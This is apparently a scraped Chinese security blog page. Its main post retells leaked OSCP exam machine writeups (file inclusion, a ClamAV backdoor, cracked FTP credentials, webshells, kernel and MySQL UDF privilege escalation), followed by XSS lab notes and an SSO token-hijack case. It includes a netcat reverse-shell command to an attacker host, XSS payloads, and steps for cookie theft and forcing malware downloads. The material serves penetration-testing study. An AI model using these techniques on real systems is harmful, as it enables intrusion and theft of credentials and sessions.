Pluck(本地文件包含+内核漏洞提权)
oscp真题解析
由于微信公众号文章的不稳定性,我收藏的某些文章竟然提示已经被作者删除。由于国内的网络安全法,所以遇到微信公众号上的好文章最好保存到本地,以免过段时间去看就已经被删掉了。
OSCP真题泄露-目前已经移除
OSCP真题泄露-目前已经移除
0x0010-关于:
这次考题的泄露是因为一位国外的大佬对近期OSCP考试中存在大量的替考和作弊者很不高兴,加之OSCP的考题很久很有变化,因此这位大佬很生气,就在他的推特和个人网站上陆续公开了一些考试writeups,offsec官方响应也很快,已经将泄露的机器移除了考试环境。但是,作为学习还是值得学习的,有助于摸清套路。
这位大佬的网站是:https://cyb3rsick.com/
泄露的真题在:https://cyb3rsick.com/category/oscp-exam-writups/?order=asc
0x0020-老真题讲解:
0x0021-192.168.x.53 – offsecsmtp – OutOfBox
原贴传送门:https://cyb3rsick.com/2019/01/20/192-168-x-53-offsecsmtp-outofbox-machine-writeup/
第一步:信息收集
用nmap进行主机扫描
命令:nmap 192.168.x.53 -A
发现80端口,找到192.168.x.53/robots.txt文件泄露2个md5值(例如:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx),这里可不是让你解md5,这是出题者故意藏起来的目录。
第二步:渗透
发现文件包含漏洞,GET请求“ /xxxxxxxxxxxxxxxxxxxxxxxx/inc2.html?passwd”获得passwd文件:
获得可以用户名:OutOfBox
使用ssh连接主机,账号密码都是OutOfBox
第三步:提权
NSF可写,可以创建一个可以行文件,用setuid(0)获得root权限:
上传后运行获得root:
【套路总结】:
1、端口扫描中发现web服务必是重点;
2、有web先看robots.txt;
3、passwd中的可以用户名肯定有问题(弱口令很有可能);
4、提权方法之一:setuid(0)
0x0022-192.168.x.161 – Ph33r machine
原贴传送门:https://cyb3rsick.com/2019/01/20/192-168-x-161-ph33r-machine-writeup/
第一步:信息收集
老规矩nmap扫描端口:nmap -A 192.168.x.161
没有有价值发现,使用onesixtyone扫描,发现clam av运行在主机上,这个软件存在已知的后门利用
https://www.exploit-db.com/exploits/9913/
第二步:渗透
使用上面的exp打之,就可以获得在31337端口获得一个绑定shell,nc连上去就是root权限
【套路总结】:
1、第一步都是nmap扫描;
2、nmap未发现问题时,试试snmp扫描,可能有奇效;
3、注意一些冷门软件的漏洞,可以在exploit-db上搜索。
0x0023-192.168.x.55 – Admin-pc machine
原贴传送门:https://cyb3rsick.com/2019/01/22/192-168-x-55-admin-pc-machine-writeup/
第一步:信息收集
nmap:nmap 192.168.x.55 -A
结果如下:
发现ftp匿名访问。
第二步:渗透
ftp连上去获得xampp的配置文件:
获得用户认证信息如下:
fm:$apr1$yT3K79by$RbmkKdKGdaXs80zPCIZnR1
破解可得明文如下:
fm:x-files
进入后台:192.168.x.55:10433/admin可以进行文件管理进而执行命令。
上传nc并且上传php文件开执行命令“nc –vv YOUR_HOST 443 –e cmd.exe”获得反弹shell
第三步:提权
上传jsp的webshell到“c:/xampp/tomcat/webapps/examples”目录,浏览器访问192.168.x.55:10433/examples/cmd.jsp?cmd=whoami,即可获得管理员权限。
【套路总结】:
1、ftp匿名访问,尤其是可写权限的一定要注意;
2、xampp是重要考点之一,配置文件之类的要注意;
3、高端口肯定可疑,不是后台就是某些软件的漏洞;
4、提权可以多试试不同脚本,很有可能不同脚本的执行权限不一样,如php是低权限、jsp也许就是高权限。
0x0024-192.168.x.53 – unreal tournament machine
原贴传送门:https://cyb3rsick.com/2019/01/22/192-168-x-53-unreal-tournament-machine-writeup/
第一步:信息收集
端口扫描:
tcp端口未发现有价值的可以试试udp端口
发现udp开启7778端口,是一个IRC服务,使用IRC客户端登录,发现提示信息中有unreal tournament。
第二步:渗透
exploit-db搜索unreal tournament,发现漏洞exp:https://www.exploit-db.com/exploits/16145
替换其中shellcode
使用msf打之,搞定。
【套路总结】:
1、注意udp的高端口;
2、冷门软件exp到exploit-db上找;
3、具备替换shellcode的能力是必考点。
0x0025-192.168.x.55 – UCAL Machine
原贴传送门:https://cyb3rsick.com/2019/01/22/192-168-x-55-ucal-machine-writeup/
第一步:信息收集
web扫描直接上“nikto -host 192.168.x.55”
发现:
第二步:渗透
exploit-db上找exp:
https://www.exploit-db.com/raw/18775/
打之,获得反弹shell
第三步:提权
使用Mempodipper提权:
https://www.exploit-db.com/raw/35161/
搞定
【套路总结】:
1、web扫描主要靠找到使用的哪套web程序,再到exploit-db上找exp;
2、提权看内核版本找exp打。
0x0026-192.168.x.67 – OFFENSIV-W2K3 machine
原贴传送门:https://cyb3rsick.com/2019/01/22/192-168-x-67-offensiv-w2k3-machine-writeup/
第一步:信息收集
http://192.168.x.67:8080/mail/checkspool.php存在远程命令执行,可获得反弹shell
第二步:渗透提权
读取配置文件 C:\Program Files\hMailServer\Bin\ hMailServer.INI
获得加密的root密码
使用C:\Program Files\hMailServer\Addons\Utilities\DecryptBlowfish.vbs脚本解密
修改配置文件,增加密码方法如下:https://www.hmailserver.com/forum/viewtopic.php?t=31096
上传lib_mysqludf_sys.dll到C:\xampplite\htdocs
再上传webshell文件adminer.php
执行命令调用dll
增加管理员账号,登录就是管理员。
【套路总结】:
1、web是低权限shell常见入口;
2、应用软件的配置文件是重点(账号密码);
3、mysql的udf提权需要注意。
更多资源关注知识星球“OSCP轻松过”
微信扫一扫
关注该公众号
学习清单:为oscp做准备
Offensive Security Certified Professional
ptf框架
上一篇: AWS亚马逊云服务器搭建与使用
- https://github.com/trustedsec/ptf
- https://vimeo.com/137133837
- https://www.freebuf.com/sectool/209091.html
Wall-rce与绕过waf(下)
参考资料:绕过waf之命令执行
渗透实战第三版实验csk-web之XSS
参考资料: 下载地址:
- http://thehackerplaybook.com/get.php?type=csk-web
echo 目标机器的ip chat >> /etc/hosts
首先我们看下这个网站,注册一个账号并登陆。网页上有一些存在漏洞的提示。
反射型XSS
http://chat:3000/chatchannel/1
反射型XSS是最简单的xss,因为网页没有过滤用户输入,或者过滤不完全,导致用户可以输入js语句,根据js语句的不同,可以任意执行js代码。
案例一,script标签
<script>alert('xss')</script>
案例二,过滤script标签的情况
<svg onload=alert(1788)>
案例三,点击弹窗
<b onmouseover=alert('XSS')>Click Me!</b>
一旦鼠标移到Click Me!,就提示xss
一旦点击就弹窗
1 | |
案例四,跳转并文件下载
kali准备恶意代码exe,并开启web服务:
1 | |
kali的ip为192.168.159.129
访问路径为:http://192.168.159.129:8001/test.exe
在页面上输入以下代码:
1 | |
于是客户端就会跳转到这个下载地址,http://192.168.159.129:8001/test.exe
这个跳转并文件下载要配合存储型xss。
案例五:cookie窃取
将下面的php代码保存为cookie.php
1 | |
然后用php开启web服务,
php -S 192.168.159.129:8002
这是kali的地址:http://192.168.159.129:8002/cookie.php
存在漏洞的页面输入以下代码:
1 | |
成功获取到了admin账号的cookie。
但是这里有个问题,就是使用cookie登陆时候,发现cookie失效的时间太短了。
经过数次尝试,因为输入窃取cookie的js代码,会跳转到google.com,这会导致用户的cookie退出网页,使得cookie直接失效。。
要注意的是,速度要快。。cookie过期跟服务端的网页设置有关。
子域名搜集
上一篇说到了基于字典爆破的子域名搜集,这一篇讲一下基于搜索的子域名搜集。
绕过waf之命令执行
引子
人生不是做菜,不能等所有材料准备好了再下锅。
Wall-rce与绕过waf(上)
sso登陆劫持漏洞
引子
最近项目遇到这个漏洞,但是我没有发现。。
正文
参考资料:
sso单点登陆,用户一次登陆,所有系统都可访问。
sso设计目的是简化登陆方式,可能有很多系统,但是多个系统都是一个机构的,每个系统每次都要分别登陆就很复杂。
举个例子,OpenID是一个很流行的sso框架,
用户提交1. openID 2.openID Provider(提供者)
网站重定向到openID provider认证,登陆成功后,再重定向回网站。
这里可以理解为,门卫不知道你是谁,然后让你去某某处盖章,你去盖章完成后回到门卫处,门外验证红章没问题就让你通过。
案例
1 | |
此处有一个参数backurl=abc.com,当修改此参数为backurl=abc.com.test
网页向abc.com.test,也就是openID Provider(提供者)提交一串openID。
提交后,网页提示无法连接abc.com.test,并且抓取到了一段数据包,包含了登陆成功的token。
由于客户可以伪造openID Provider(提供者),此处产生了sso登陆劫持漏洞。下列的sid是token。如果使用以下token,再次访问http://abc.com.test/Account/Login,可以发现已经登陆。
1 | |
攻击方式
攻击者可以将backurl修改为自己的地址,然后发送恶意连接
http://abc.com/public/pages/login/index.html?backurl=http%3A%2F%2F恶意地址%2FAccount%2FLogin%3FReturnUrl%3D%252f&app=YuLinTu
一旦受害者点击链接,并输入正确的用户名和密码。恶意地址会收到如下的get请求“GET /Account/Login?ReturnUrl=%2f&sid=96c2182d0da29dc720fab468734fef9e47ced2993df16fda6b03c98e92f6e77475b4cf56623430d6 ”
攻击者就可以使用token sid=xxx,以受害者的身份进行登陆abc.com。